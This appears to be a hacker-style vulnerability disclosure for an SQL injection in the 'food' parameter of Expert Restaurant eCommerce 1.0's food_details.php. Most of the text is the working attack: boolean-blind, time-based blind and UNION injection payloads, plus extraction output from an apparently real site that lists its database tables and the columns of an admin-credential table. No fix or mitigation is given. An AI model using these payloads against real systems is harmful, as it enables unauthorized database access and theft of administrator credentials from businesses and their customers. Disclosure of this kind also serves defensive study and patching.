┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.codester.com/items/20872/ │ │ Vendor : Expert IT Solution │ │ Software : Expert Restaurant eCommerce 1.0 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /food_details.php https://www.website/food_details.php?food=[SQLI] GET parameter 'food' is vulnerable to SQL Injection --- Parameter: food (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [+] Starting the Attack fetching current database current database: 'sagor_****_restu' fetching tables [34 tables] +--------------------------+ | add_to_cart_view | | admin_url | | contact_manage | | currencies | | customer_info | | delivery_live_status | | expense_manage | | food_category | | food_dish_manage | | food_dish_vari_man | | food_field_variant | | food_field_variant_value | | food_order_confirm | | food_review | | food_sub_category | | food_tag | | gallery_manage | | hall_manage | | income_manage | | kitchen_live_sta | | menu_manage | | opening_manage | | order_accounts | | order_other_address | | page_manage | | payment_gateway | | shipping_charge | | site_setting | | slider_manage | | social_manage | | sup_ad_log | | table_book | | table_manage | | team_manage | +--------------------------+ fetching columns for table 'sup_ad_log' [5 columns] +----------------+--------------+ | Column | Type | +----------------+--------------+ | status | varchar(100) | | id | int(11) | | sup_admin_name | varchar(100) | | sup_pass | varchar(100) | | sup_user | varchar(100) | +----------------+--------------+ [-] Done